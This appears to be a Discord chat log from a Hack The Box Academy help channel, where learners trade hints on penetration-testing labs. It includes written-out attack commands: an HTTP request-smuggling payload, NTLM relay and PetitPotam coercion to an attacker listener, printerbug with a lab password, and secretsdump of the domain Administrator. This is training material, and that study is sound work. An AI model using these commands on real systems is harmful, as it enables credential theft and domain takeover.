#modules

Thanks ! But if I click again on spawn a target, since I have a free subscription, I will loose my instance no ?

Don't need to click it again. Just try xfreerdp again.

You're using the pwnbox, so I take it you're not on the VPN right? You don't want to be on the VPN and have the pwnbox spawned at the same time.

Yes I am using the pwnbox. I tried again, but I do not think I have the right destination IP :

i see the issue

you're using your own IP instead of the target IP

Yes ! I tried several ones

Cannot find where the IP is written

You need to click that to spawn the target, then it will show the IP

Ok, I spawned the pwnbox too soon maybe. I will try

Ok, target =! instance

Many thanks for your help !

Target is the victim, the target you are attacking

I understand better know ! I feared I had to restart an instance. Ahaha

Hello everybody I am currently on the exercice "Exploitation of PDF Generation Vulnerabilities" I am lock on the exercices I found the port for SSRF (8080) but I tried to eenumerate without result. If someone have a hint thanks

Can anyone help me with this ?

Guys im new to this is there any course to learn how become a hacker?

Good ethic

Hack the Box's Academy platform has this. The pentester's path, or bug bounty, etc, depending on what you're trying to learn.

https://academy.hackthebox.com/

Thank you

First Request

GET /404 HTTP/1.1
Host: ip:port
Content-Length: 4
Transfer-Encoding: testchunked

31
GET /admin HTTP/1.1
Host: ip:port

0

2. Request
   GET /404 HTTP/1.1
   Host: 94.237.61.242:33849

Can anyone help with the TE.CL question? Where exactly am I making a mistake in the requests? I detected the TE.CL vulnerability, but I cannot go to the admin address

So I am working on the new module "Active Directory Hardening - Recon & Initial Access". At the end of the section "Other Common Initial Access Weaknesses" I have tried every possible answer. The question is "What service running on a domain controller or other host can be potentially leveraged for an authentication coercion attack?" Can someone help me out with this please? I've finished the rest of the module.

can someone help me to connect the machine via ssh? i think it's problem on a HTB side, ovpn works fine, but i can't connect to the machine, i don't know how to fix it, maybe anyone who knows, please?

ssh: connect to host 10.129.44.142 port 22: Connection timed out

I've been having issues connecting to boxes today

i can't connect for 2 days, idk i have no enough exp to solve this problem

Maybe try a different region

i've tried US and now trying Europe

same trouble

I'm not sure

@blissful verge

No need to ping people specifically. Just be patient and someone might be willing to provide advice.

Make sure you understand what the question is asking, to find the service, then re-read the section and look for services it may be talking about.

I have already put in every service listed

I also put in every service running on the machine. It's not a complex question

i didn't even use the target provided, the answer is in the section if you read it

Hello everyone!
I'm trying to answer a question related to the SMB tool. It asks me to log in as the user "bob" and access a specific folder. However, the bob account requires a password. The only hint given is: "bob likes to use weak passwords."

I've tried every weak password I can think of, but I still can't log in as bob.
Unfortunately, I can't send screenshots in this group, and I don't know why it doesn't allow me.
Can anyone help?

Re-read the section carefully.

😉

tell me pls what can be wrong? when i ping target in a pwnbox it's working, but when i use my vm it absolutely not working. i can't connect via ssh

ovpn works fine

i have no clue what to do

Thanks. I didn't realize it only wanted one word

Have you solved it? Do you still need help? Write me privately.

Are you using both the Pwnbox and your VM at the same time? They share the same IP, so if you are, it's going to cause network issues like you described.

ye, but earlier i've tried to connect only using VM and nothing helped me

Decide to use the Pwnbox or your VM. Do not use both at the same time. Reboot your PC. After rebooting re-download the VPN file if you want to use your VM (choose TCP for a better experience.) Press CTRL+SHIFT+R on the page you're on to hard refresh it. From there spawn the target. If you want to use Pwnbox spawn it, otherwise connect to the VPN. Allow 3-5 mins for the target to fully spawn, then try again.

i feel it not gonna solve the issue but i'll try

rebooting the pc is probably not neccissary but it can help if something messed up with your windows network stack and/or your vm's connection with it.

if that still doesn't work, try changing regions with the vpn. make sure to fully shut down the target and hard-refresh the page before after you download the new file, then power them up and connect.

okay

changed vpn region. hard refreshed page

if it's still not working then probably have to reach out to support on the website. everything i mentioned should have fixed it unless you have a misconfiguration somewhere.

or just use the pwnbox, should work.

os is 3-4 days, i don't think i've messed somewhere in filesystem. so seems to be support is the only way

can your vm reach websites and stuff?

ye, i've connect to another server via ssh right now

and it works fine

alright then yeah i'm out of ideas

maybe i should use another distro

i use vmware workstation for my hypervisor

maybe this problem on a htb server side?

i just can't even ping machine ip

i doubt it, it's rare but it happens. usually a lot more people speak up when there are issues.

https://status.hackthebox.com/

hmm

so sad

interesting part of it is that i've successfully connected to vpn, but can't connect to machine

also i've never write sudo apt update

module/19/section/101 Are we looking for the OS of the attacking machine or the target? Can someone explain why the answer is what it is for this section? I didn't understand the hint for this section, but guessed it right.

Better to just say the module and section

can it be that htb blocks my ip?

Highly doubt it, you're using the VPN IP. Contact support on the website.

currently stuck in the Medium Footprinting lab. I found the creds to the ||SQL DB|| but can't login. The error is as follows ||A connection was successfully established with the server, but then an error occurred during the login process. (provider: Shared Memory Provider, error: 0 - No process is on the other end of the pipe.) (.Net SqlClient Data Provider)||

try logging in ||as admin||

I'm stuck on Windows Lateral Movement - WinRm module trying to connect to DC01 as Leonvqz. I've got a RDP session on SRV02 with leonvqz and despite everything, I can't read the damn flag.txt. Hints welcome 😉.

For Network Enumeration with Nmap, Host Discovery, Are we looking for the OS of the attacking machine or the target? Can someone explain why the answer is what it is for this section? I didn't understand the hint for this section, but guessed it right.

You're looking for the OS of the target system. And if you've done the Intro to Network Traffic Analysis theres a part of packets you can use to guess the target OS.

@stray pilot This server isn't a hacker for hire server. Read the #rules.

Thanks, that's what I thought, just wasn't completely sure about it.

@obtuse cove This server is for discussion of the various HTB platforms. This channel specifically for modules in Academy. Please read the #rules.

Anyone else having fun with File Transfers module?

Im in this module now

You have to many ways to Transfer files

Is an interesting module

module: linux fundamentals
page: system information
question: “what is the path to htb-student’s mail?”
and im kinda dumbfounded

look at the env

Ohhhhhhhhhhhhhhh thanks

module: Intro to Assembly
page: shellcoding tools
question: Why do you need to provide argv to the /bin/sh as another argument?
Wouldn't be like trying to run "sh /bin/sh" (which does not even work for me when I try to execute it)

thanks!

nice

Hello

Can someone help me in some LLM Output Attacks module labs?

Hello, I tried the enumeration and stuff and I continue to be lock I made lot off enumeration as SSRF if someone have a hint thanks

I read the php files with LFI and apache configuration file and found the port 8080 redirect to 8000 in intern but nomore information if someone have a hint. I also used sec api list for rest action

Hello, I am currently doing the Password Attacks Skills Assessment and I am stuck in DMZ01. I have managed to get the credentials of the first user, but I am not able to pivot to the other target hosts. I have found another user in DMZ01 that seems significant, but I'm not able to proceed with that attack vector. May I have a hint on how to proceed?

dm me the user u have access to

hello

hey, i checked and the account ||sccm has generic all over system management||, but i`m not sure how to exploit this..

does anyone know if it's correct that the vpn reconnects every few minutes? after the phrase sequence completed?

If you’re on the last flag of the SA, you just have to check the privileges for the accounts you have

yes, i have pwned the ||SCCM machine, i have the hash of the administrator, and SCCM also the password of sqlservice, saw that genericall but not sure how to go forward||

does it break your connection or what?

i can't even connect to machine

Am a new leaner

dm me of ss of your terminal of the error

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@wet cliff^

@dapper moth can i dm u?

Sure

I want to be a pro hacker

whomever doing the Drupal - Discovery & Enumeration section in the HTB Academy Attacking Common Applications Module https://academy.hackthebox.com/module/113/section/1089, can now use droopescan where I submitted a PR fix at https://github.com/SamJoan/droopescan/pull/80

@wet cliff

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I click the link but don't know how to use it

Hi, have anyone completed Skills Assessment 2 of Windows Evasion? I can get a reverse shell when calling the VBS from Dev box or in the target box when calling the script from whitelisted directory. However , putting the script on the directory of the assessment, the log only shows timeout messages. Anyone available for directions what do I need to check in my payload?

I need to pay before I Lean?

@prisma wing don't spoil things for modules above tier 0

Oh my bad! Can i dm you? or shall, i raise a ticket?

1. My Dms aren't open
2. it's likely not an issue with the environment so support won't help

Alright then I'll just keep resetting until it works then, thanks for nothing i suppose

my only general suggestion is to try a different pivoting tool if the one you're using only works "50% of the time"

Can I get a hint for PW Attacks Skill Assessment? I can't grab initial foothold. I can't figure out username. Tried plenty of different combos, not sure if I'm missing something.

Use the tool covered in the Attacking Active Directory and NTDS.dit section.

tail -4 /etc/proxychains.conf

tail: cannot open '/etc/proxychains.conf' for reading: No such file or directory

Pivoting Tunelling and Port Forwarding if there is no such file so what we are supposed to modify?

hello yall does the secure coding 101 discuss postmessage stuff

I suppose

@dapper moth is the only person I know who did it, they can tell us better.

Due to the Module review? 😂

Guys if someone has completed Pivoting Tunelling and Port Forwarding please tell me cause I am really stuck

I understand how it is working but it is not working for me on target machine

Hi folks

The target is not spawning, it spins and spins then gets back to Click here to spawn the target https://academy.hackthebox.com/module/177/section/1766

Can you look into it please ?

Have you tried reloading the page?

yes and logout /ogin

spawn target is stuck

can anyone help

probably the bug in their system

what can i do

Please reach out to support

Done thanks

they do not monitor this channel ?

@viscid epoch u have the same problem as me?

sounds like yes, even though the status page says all is operational https://status.hackthebox.com/

ok, I have created a ticket aswell

I face the same problem

Hey there. I'm having the same issue as the above

Yes, lol.

No, the support is not active on Discord

Have a look here #faq

for reaching to support go directly on site

proxychains4

https://app.hackthebox.com/users/179474

why does this guy have 1 point when he owns a lot of machinesç

Dude do you speak English?

targets are still unavailable as I see ?!

Thank you Nuts

proxychains4 doesn't exist either

Are you using your own vm or the attackbox. Did you install proxychains? alot more information is needed to assist here

using my my personal vm

yes I figured out a bit how to use it but still a bit stuck

shoot me a dm Ill try to assist ^

Hi all box name Nibbles - Initial Foothold, on PT path, getting started
I don't see the upload bottom wen I browse
I should see bottom like that,

and upload php file to get access But all I see is that

I need help with the Active Directory lab part 1. I have no idea what I'm doing 😭 I don't know how to get to the AD to add and remove users. HELP 🙏🏽

Something wrong the way I wrote the IP and PORT please?

sorry

this one

It ok thanks I get the flag

Hey, I’m stuck on the Pass the Certificate lab. I have creds for user wwhite and know the CA machine, but:
No web enrollment on CA
Can’t find a cert template that wwhite can enroll for (tried User and SubCA)
Certipy requests fail with RPC errors (like “Failed to get dynamic TCP endpoint for CertSvc”)
Not sure how to confirm cert enrollment permissions or fix the RPC issue
Anyone done this lab or have tips on requesting certs when web enrollment is disabled? Thanks!

anyone with an idea here

If you are enumerating the CA and receiving errors, I would just restart the targets and once they come online (IP addresses assigned to each target), I would then let them sit for a few minutes just to ensure they have fully spun up and configured correctly.

Thanks gotta try that

I'm on pass the certificate. I'm struggling to get the inbound connection to work properly. I had to run the http port on 8080 as it kept telling me 80 was already in use and when i took everything running on 80 offline the box closed. The screenshots are from commands given

impacket-ntlmrelayx -t http://10.129.234.174/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication --http-port 8080
This is whats running on the left terminal

It just continues running new SMBD threads that receive connection but dont go anywhere

use sudo

still receiving [*] Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies

[] Attempting to trigger authentication via rprn RPC at 10.129.234.174
[] Bind OK
[] Got handle
The NETBIOS connection with the remote host timed out.
[] Triggered RPC backconnect, this may or may not have worked
[-] An unhandled exception has occured. Trying next host:
[-] Error occurs while reading from remote(104)
from the one running the printer script

Try PetitPotam for example: nxc smb <ip> -u '' -p '' -M coerce_plus -o METHOD=PetitPotam LISTENER=<AttackerIP>

Wait, what IP is the CA and what IP is the DC?

10.129.234.174 DC
10.129.215.139 CA
I may be trying the wrong one you're right

let me look through it again

haha sorry i didnt realize there was two

i think it's still not working

i used the DC on the printerbug

python3 printer.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.174 10.10.15.197

and I used the CA on the other one

sudo impacket-ntlmrelayx -t http://10.129.234.139/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication --http-port 8080

this time it took longer to give a error and created like 15 threads but nothing came of it still

That should have worked from what I can see, try to reset the machine and try again

will do\

still nothing :/ also tried it without sudo & restarted the target

trying it without 8080 port gives address in use still also

Guys please help, what is the sudo password ?
I follow the module and they dont mention anything about password

try chmod +x linenum.sh

prior to running it

ohhh thanks right I forgot

send me a pm @tropic wind

im having an issue on the using crackmapexec modules, popular modules, question What's the password you found in the KeePass database file? , the command will not extract the password for some reason any ideas?

if you've already previously cracked it use --show

Now I add the Monitor.sh and I need to run it with sudo, cause the LinEnum scan shows I can do it, But it still ask me for password

please help

I am on starting point - Nibbles Privilege Escalation

Need to do "sudo monitor.sh"

ask me what is Nibbler password

start simple, see what you can do with sudo without a password first.

I start and saw I can run the Monitor.sh based on the LinEnum.sh scan

Some finished skill assessment 2 of windows evasion i need some guidance

Okay, so if you read over the section, have you tried exploiting it as it shows?

yes I just do "sudo monitor.sh"

but it ask me for password

That's not what the example shows.

I dont understand

Re-read the example, look at the commands it provides to exploit monitor.sh. If you CTRL+F "sudo monitor.sh" nothing comes up, so you aren't doing the command as shown.

because the full path?

idk, try it

no its not that

I tried

sudo /home/nibbler/personal/stuff$/monitor.sh

what was the result?

where'd you get the $ from?

i'm still struggling on pass the certificate.
sudo impacket-secretsdump -k -no-pass -dc-ip 10.129.198.230 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
I've also tried it without sudo

ask password

You still aren't doing what the section showed you. You added a $ to the path for some reason.

hey did you manage to solve it

no

Im sorry, you right. I tried now without the $

guyz can u help me i have a usb drive that's a bit old and is has some data and i want to format it but it's write protected how to remove that thing I've tried some tutorial from youtube but it's not working for me

Now he said "I need something more specific"

i'm kinda stuck at it too

Your command executed the script as intended. The script has something in it causing those errors.

This has nothing to do with modules. Please read the #rules and follow the instructions in #welcome to gain access to other more appropriate channels.

i figured out the step, dms

ok its the last line I wrote there with echo

thanks I will try

Its not that its using keepass

Check to see if you can use the certificate (.pfx) with netexec.

i got it to work by adding it to /etc/hosts

Is nothing being triggered?

No it says waiting for master password to be entered then nothing

You can DM the command you used.

Still having issues with the CA or were you able to get past it?

It was hard, I think to myself if this job is for me, Im so lame

But I have dont it

it's all about the learning process, and i bet you learned something

that's a W

also, it is not an easy path

you will struggle

in the pass the hash section of password attacks, im stuck on reading the file share. I have passed the hash and logged in as david but they keep telling me i cannot access the share

can you show the screenshot please

that will make it more clear for everyone

Make sure not to spoil content from modules above tier 0

don't seem to be able to send screenshots

You need to identify your account by following the rules in #welcome and also may need a certain rank but I'm not sure about that

regardless that module is above tier 0 so best not to post anyway

yea alright

its just a generic windows pop up anw

i'm just confused why im logged in as the appropriate user but i can't access the share

Am I missing something to get to Administrator? The instructions stop at jpinkman so am I meant to just try to priv esc to Administrator now?

https://academy.hackthebox.com/module/147/section/1335

The section mentions that user being in a specific group.

Does it have to do with cracking the hash given earlier im guessing ?

hey

No cracking necessary. It's discussed and shown in the part just above the last paragraph titled No PKINIT?

thanks i'll check it out again

i am not able to open a mounted nfs share

it says permission denied

Your words important for me, thanks for that

So I see it mentions that jpinkman is in Remote Management, I connected via evil-winrm to jpinkman and got the .txt in desktop, but i'm still struggling to understand how i'm meant to connecto administrator from that. I tried switching back my .ccache file but the earlier one is a machine file not a user so it can't be used

I don't believe snaffler or mimikatz is pre installed and the winrm shell seems unstable so I don't think thats the proper approach either to go about installing them

Ah, so you are on Q2? For some reason I thought you already did Q2.

Yes, I finished Q1 which is just getting the .txt file from jpinkmans desktop

Earlier didn't you perform an attack that got you a DC cert?

Yes i got the .pfx file and a dc.ccache file but exporting the .ccache file wont allow me to connect because its a machine not a actual user, maybe i could use the .pfx file but i need to figure out how to use it for administrator

You can DM if you'd like.

Hi guys i need some help

With what? You need to explain before people can help.

I didn't tell you to DM me.

Well i did

can anyone help

What you messaged me is wildly against the rules...

You can use impacket-secretsdump

Ok

Yea I had done that earlier, I had forgot about it i'm gonna attempt to PtH

Please read the #rules and do not DM people randomly.

Ofc i will

For Windows Lateral Movement Skill Assessment--Any Hints on What's the content of the flag located at DC C:\Users\Administrator\Desktop\flag.txt? I have Proxychains set up and can connect to the VNC however its just blank to me. no window pops up

Been stuck on this for 4 days. any nudges be appreciated to finish it.

Best to include the module and section you're on

Hey guys, can you please help me with following question: i have pivot host and active directory internal network that is reachable through this pivot host. I want to use bloodhound python for the DC inside this internal network but i constantly get DNS error. How can i tunnel all DNS packets in correct way? I tried SOCKS5 dynamic port forwarding and sshuttle but it throws DNS errors at me if i try to launch bloodhound-python

Is there an easy way to see all completed modules, in list format? 😄
Found the "owned modules", but hard to get a graps with all the massive images

Module: HTTPs/TLS Attacks
Section: Padding Oracles

In the prevention paragraph, the link to "Never Roll-Your-Own Crypto" seems to be not working on my end. Is it only me or the link is broken?

Share the link, I'll try? 😄

Alright one moment

https://resources.infosecinstitute.com/topic/the-dangers-of-rolling-your-own-encryption/

Nope 404 for me as well

I didn't even get 404 lol

It was the chrome default error page for me

Same 😛

Didn't use browser to check

Haaang on says my hosts doesn't resolve, is it a vHost you forgot?

You can DM what you know and have have tried.

Anyone know a good way to learn how to use AD? I am totally new to the field and have no idea what I'm doing to complete the Advanced Directory lab

maybe this https://academy.hackthebox.com/module/details/74

10 cubes, so one of the cheap ones 😄

That's the one I'm on, I'm stuck on the lab part towards the end. I don't know how to get to the AD to start adding users.

Sorry haven't done it yet, but on my todo 😄

I'm on the pentest job path currently, so gotta get some AD in before the cert.

Good luck to you

https://academy.hackthebox.com/module/147/section/1356
I'm currently struggling with where to go. I created a username file and attempted to bruteforce all ssh/ftp sessions using given password and the user file i made with no success. I managed to get a antak webshell on one of the IP's but I'm kind of unsure how to go about it from here and I can't figure out how to pivot using this.

Did you use any of the methods covered in the Attacking Active Directory & NTDS.dit section to create a username list?

So... You have a potential password and an employee name, but not a username, what do you need to do?

I created a rule to generate a wordlist

or i just used the prexisting best64 list but It may be a better idea to try to make my own

I'd revisit the section I mentioned.

Will do

You already have a potential password; no need to try to generate more passwords until you try that one. You are just missing a valid username.

I know I tried to generate a username file though

I'll revisit the section and see what come sup

What it means if /proc/self/environ outputs just 4 characters "l www", im trying lfi/rfi

Is getting someone’s ip illegal

It depends
But if you ask like that, then pretty sure yes

What's that got to do with a module?

I typed on the wrong area

There’s this guy that is prank calling me non stop

Please read the #rules and follow the instructions in #welcome to access more channels. Also we don't discuss illegal stuff here. If someone's harassing you then ignore them or go to the authorities.

Ok thank you

pls hint

not the full answer pls

i've tried check var and found mail but it didnt work

MAIL=/path/to/mail

i think there is a problem with this task, cuz in /var/mail there wasn't htb-student

....

Which module and section?

copy/paste from the env itself

is it bad?

environment variables can contain paths that aren't on the system

i don't understand

on the server system?

from the environment variable for MAIL

JUST COPY/PASTE THAT

you don't have to navigate/confirm it exists

i think i get it now

so all this task is using env in terminal

ty

Yes

Hey MarcieLee, mind if I DM you a question thats kind of related to your mentorship but not in the realm of being able to freely dm you about it without asking?

Go for it

anyone available that can help me on the last part of the advanced sql injection skills assessment? trying to get my RCE script to work but can't see why its not working

Yo, im quit New Into programming and I want to make a cheat for fishing planet, but I have no idea where to start

Read the #rules and follow the instructions in #welcome then you can access other channels that are better to answer this question like #programming. This channel is only for discussion of the various modules on Academy.

My Bad sorry

Hi everyone

Excited to start my journey here

Hi, welcome. Make sure to read the #rules and follow the instructions in #welcome to gain access to other channels.

Hi all, I have a question on CAPE Windows Lateral Movement
Windows Remote Management (WinRM) I am working on the question Connect to DC01 as Leonvqz and read the flag located at C:\Users\Leonvqz\Desktop\flag.txt

I solved this not in the intended way and would like to know the intended path, I can DM, thanks

Hello, could someone please help me with the last point of the last part of the DACL I module. Thanks.

The skills assessment?

This link right here got me over the finish line. Thank you

Hey guys I am kind of stuck on NSE Script section of the Network Enumeration with Nmap. Ive tried looking for vulnerabilities with the web server and outputting to a file and searching for it but for some reason I cant seem to find the flag. I also tried the other categories for the scripts and nothing.

Any help is appreciated

what is the question

Nevermind I figured it out. But thanks @solid mirage

Im 4 hours and 6 blogs deep in the dns footprinting and im getting crazy, i dont want to spoil it here, but if someone can help me i ccan give the context in the dm.PLSSSS

whats the issue?

hey guys, I'm sorry to be a pain but I am so confused! I started the linux fundamentals course yesterday and I do not understand why the questions at the end are unrelated to the content I am learning. I am in the Filter contents section and hve not been introduced to cURL. The only time I have heard it is in the section Files and Directories where it says: Which
One of the common tools is which. This tool returns the path to the file or link that should be executed. This allows us to determine if specific programs, like cURL, netcat, wget, python, gcc, are available on the operating system. Let us use it to search for Python in our interactive instance.
and Getting Help where it says: Some tools or commands like curl provide a short version of help by using -h instead of --help:

Does anyone know why this is, as I am finding it quite frustrating to complete the questions when they go in random orders that seem to not make sence. Any help would be greatly appreciated thanks!

Everything you need is in the module

which machine in X-HTB machine is recommended for web-requests to practice or is web-requests is enough?kindly any one? this is a starter

Hi, i have problem with Skills Assessment - Hacking WordPress - https://academy.hackthebox.com/module/17/section/64

I have got the admin pass, and logged in to edit 404.php, but get error:
Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP

I think it's the permission problem, but how to solve this?

htb modules are like that (which makes u go google stuff and learn some new things / techniques on your own) and learning new things is frustrating to everyone coz we hit walls several times when we do something we dont know or we learn something new. i hope you got the answer ;v

what modules should you complete to start off as a begginer? (academy) or should you choose a path instead?

Hi guys, I am using Ligolo pivoting in the "Skills Assessment - Password Attacks" module, but I can only ping DC01 and cannot ping JUMP01 or FILE01.
Is it a bug?

Without having done it yet, is it pivoting maybe? 😄

https://academy.hackthebox.com/paths

There's a few basic ones to get you started 😄

Look for medium or easy, alternative consider Fundementals on https://academy.hackthebox.com/modules

Not every machine responds to a ping. I don't know whether this should be the case in this lab

emmm...probably not. I use ligolo many times, this is the first time I can't ping every machine in internal network.

Or still can solve this module with this issue?

This has nothing to do with ligolo, but with the configuration of the machine. As I said, I don't know the revised module and therefore don't know whether the machine should respond to a ping or not.

can anyone give a hint? thank you

Hi there, I finished the gpo section of the module DACL-2. But I did it with the windows approach. I am running into some issues with the linux approach. Is somebody open for a discussion about it?
If so just send me a dm.

I am super stuck on https://academy.hackthebox.com/module/113/section/2164
I try the SQL injection and it doesnt work, im also not able to get the file download for fatty-client.jar, this module is super frustrating me haha

i solved and slept, thank you for trying to help

Morning/Evening all, I'm running into an issue on "Azure Enumeration" for the Active Directory Bloodhound section. When attempting to run "TheEdgeMaker.ps1" script I get no prompt for my Azure login. However, I get an error stating authentication failed. Seems like some session is still cached? Any solutions? Many thanks!
https://academy.hackthebox.com/module/69/section/2070

Hello, I am currently doing the Password Attacks Skills Assessment and I am stuck in DMZ01. I have managed to get the credentials of the first user, but I am not able to pivot to the other target hosts. I have found another user in DMZ01 that seems significant, but I'm not able to proceed with that attack vector. May I have a hint on how to proceed?

no way other than pivoting

Hi, I'm on AD Enum&Atack Module Skill Assessment 1, I found credential to get into MS01, I already setup the ligolo that I can ping the MS01 from my kali, but still rdp still not working. Any suggestion on how to work around it?

in the new Active Directory Hardening - Recon & Initial Access mini-module the answer to skill assessment question Remediate finding 5: Weak Active Directory Password Policy should be reviewed...

i'm surprised you unmuted yourself

got fixed :(

unfortunate

i think you should provide more detail in /feedback

if you havent already

help me

with what

i have an error with identify

...

crystal ball is broken

nah, not yet finished - but stumbled across this question as the accepted answer is neither based on ms best practices, nor nist, nor anything from the module^^ (cc @blissful verge )

help me plss

ah

i see

@gray yacht Yes, brother, the last part, the last point. I already have the others, but I'm just missing the last one.

You can DM.

no @boreal kelp

U can't do all modules on free tier right?

no @latent harness

unless you buy cubes

hmm

cant, not yet

Of course, thank you

Anyone wana help me with advanced SQL skills assessment? can't see why my script isn't achieving RCE, debugged script in burp and everything seems to run correctly.

Hi, I'm on AD Enum&Atack Module Skill Assessment 1, I found credential to get into MS01, I already setup the ligolo that I can ping the MS01 from my kali, but still rdp still not working. Any suggestion on how to work around it?

Does netexec validate access via RDP to that host?

you can DM me

Can I DM you?

Sure

Nvm somehow it work now, anyway thank you

cheers dm'd you

did htb just get rid of their designer in april for AI but ran out of tokens for badge creation? no badge images for 3 months now

the AI had hallucinations

this happens to designers too - but mostly in the desert while on vacation :D

Hello, I'm currently doing the password attack skill assessment and i am stuck in DMZ01 can someone that did it DM me to help please because i can't say much here without spoilers. Please I need help im on it since yesterday and I've put like 15hours + on this without much success.

You managed to get a new user on DMZ01?

No i don't think so

But you have shell access right?

yes

just not a root one if that's what you're implying

Okay, keep looking then, you are missing it. Yeah, no need for root.

Can i DM you ?

Yes

Hi guys, anyone can help me im stuck on https://academy.hackthebox.com/module/110/section/1051 ?

Try using request repeating to be able to quickly test commands. With that, try looking for the other flag.

i already found flag.txt on current ath using ls-la

do you know the command that will read the flag.txt contents?

cat

so what happens when you try that one

read inside flag.txt

but this answer i found on prev answer

Hi Guys I am doing Remote/Reverse Port Forwarding with SSH in Pivoting Tunelling and Port Forwarding and there is a section of Windows upload I am a bit stuck on this

can someone help?

I have to invoke web request but I didn't understand a bit how it is working

I have to download backupscript.exe on windows machine can I do this from compromised ubuntu server?

"other" flag, look around the system a bit more with ls

We can download this backupscript.exe on the Windows host via a web browser or the PowerShell c

how to download via a web browser?

I really don't know how to?!

The targets don't have internet access, you'd have to use techniques from the File Transfer module to transfer the file over

from my attack host right?

can anyone help with the first question on the using crackmapexec skills assessment

can anyone help me with syntax of invoke request from linux to windows?

chatgpt can be great for syntax

as long as it doesn't lie that is lol. sometimes it makes stuff up.

can i dm anyone about the password cracking module - pass the hash ?

i have some question regarding the solution

Nuts I know the syntax but didn't find how to connect my linux machine with windows machine ip

the two machines can't talk to each other? as long as the network connection is there, there are tons of ways to transfer a file

has anyone done "Cross-Site Scripting (XSS) Phishing" Module? im having major problems

many people have

such a ballache, i have tried using the vpn on my kali machine and on the pwnbox and i just cant get it done. at this point i just want the flag so i can move on

What are you exactly trying to do that's failing?

the xss, sending the like to the victim and obtaining the login details

Yes but that doesn't explain much to me, what way are you trying to attack the victim

Try using a PHP Web server that hosts the malicious file

finally, i did it! holy crap that was annoying

what was the issue?

hey guys which path is better to start with cbbh then cpts or cpts then cbbh

depends on your goals really.

cpts is a little more broad as it covers some web stuff and internal pentesting while cbbh is pretty much just web stuff

alright, thank you

Hi m why cant i send message on HTB off topic?

Read and follow #welcome

Hey, I stuck on SA 1. Could I DM you?

Hello, anyone have done the prompt injections modules?

Anyone completed the skills assessment for Android Application Static Analysis ?

I currently have access to bdavid in the skills assessment for password attacks. I found multiple .pcap files but i cant find anything in the analysis. I just wanted to see if I was missing something or if I was going down the wrong path.

i don't recall .pcap being important

Do you know if anything in the IT share is? I see a lot of .ps1 scripts but i'm not really sure where to go, I also found a USER@SERVER:0001512 hidden in a file but the port on said server is closed so idk what to do with that

it's been a minute since i did the module so you'll have to let me double check my notes

Hi guys i have a question about a module pentest in a nutshell on linux information gathering when i'm doing the scan for wordpress i don't get the theme and neither the plugin

bd* has special access to a host 😉 (mimikatz is helpful)

ill do some exploration with mimikatz i havent touched on that yet, thanks!

https://www.netexec.wiki/getting-started/using-credentials#using-credentials

i've used my user/pass list on most services, i could be missing something though but i dont believe i am, my creds for bd* worked but not st*

you're a step away 😉

idk what that means 😭
i'll investigate mimikatz but if i get stuck ill try to go through nxc i guess

Hello everybody ... hope you are find . Do you jnow any god books for learning web security ? I first look at something like "The Web Application Hacker’s Handbook Second Edition" but it's too old so I would like you to give me advice please

I'd recommend using an online educational platform instead as it can be updated. Like HackTheBox's Academy. This channel, by the way, is dedicated to the discussion of those modules. This question is better asked in something like #general or #hacker-lounge. You'll need to follow the instructions in #welcome to gain access to the other channels.

damn i don't know why but using the ip address and using the the FQDN don't give the same result

probably virtual hosts.

thanks i didn't thought about this since in the module they used the ip address

Hello there, Im stuck on the Password attacks skill assessment, can someone help me in DM please ?

is it inlanefreight.htb or .com

nslookup just does dns resolution, that's it.

yeah dnsrecond does a lot more

Did you try https?

I have free mony

WTF

Looks normal

Check open ports.

Either that or 8443.

I'm afk, but can see if it resolves when trying to navigate to them or restart the target.

am i allow for creating files and dir-s on a htb academy server for learning?

How to get the noob role

Follow the instructions in #welcome

It’s gonna reset anyway

ty

why are some of the windows VMs i've used so laggy?

did you guys find the linux fundamentals module useful for HTB stuff later?

Hello im new

How do i get access to general chat

Cant find the identifier

The link in #welcome links directly to it.

Look dm

@rustic sage Please take care not to post content from modules above tier 0. The reason it's not showing hashes is because they are already captured. You'll need to look in the file they're stored in to view them or delete the file and then Responder will show them when you run it.

You simply ask in here, no need to post content though.

You can just describe your issue

but i gave you the answer you were looking for

Where did you get stuck at the moment?

in "The live engagement" in the shells and payloads module the foothold machine keeps crashing every time i RDP into it

Download additional_samples.zip from this module's resources (available at the upper right corner) and transfer the .zip file to this section's target. Unzip additional_samples.zip (password: infected) and use IDA to analyze orange.exe. Enter the registry key that it modifies for persistence as your answer. Answer format: SOFTWARE____

tried using a python server using python3 -m http.server then using wget <link> and on the VM it just refuses to download the file and its not anywhere on the system.

thanks i will try once it restarts

On your VM? You should be able to just log into HTB and download it straight there. Also idk of any VM that doesn't support copy/pasting to/from the host machine, so it should work.

I meant from the pwnbox to windows vm you rdp into.

There are many ways to file transfer, I like using the built in /drive argument with xfreerdp if I'm already RDPing into a Windows machine

flags wont allow connection to happen

Found a working solution using remmina. ||You have to configure a share folder in remmina. you do this by typing remmina then clicking on the plus sign and the rest is very straight forward from there.||

results with xfreerdp /v: /u: /p: /bpp:8 /network:modem /compression -themes -wallpaper
[19:10:34:812] [39785:39786] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[19:10:34:813] [39785:39786] [ERROR][com.freerdp.core] - failed to connect to 10.129.201.141

connection establishes with regular xfree /v/u/p but crashes soon after

im in i removed the /bpp:8 flag and now it works lol

crashed again 😦

Always best to say the module/section/question you're on, and please don't randomly ping people

which word list did you use?

then you probably have the wrong user or something

well if you got question 1 right then you have the user

rockyou should do it, maybe check your hash

maybe try restarting the environment or changing regions, then capture it again and try again or something

Bloodhound simply doesn't show everything. Sometimes you have to manually enumerate.

It's very useful but I view it as a crutch which doesn't show you the full picture, I prefer to use bloodyAD to build out the path slowly, backwards if I have to.

Personally I think they are both suboptimal.

This is because an injestor causes an enormous amount of noise, and power view is detected by simple AV.

You should find and formulate an evasive methodology of mapping the target.

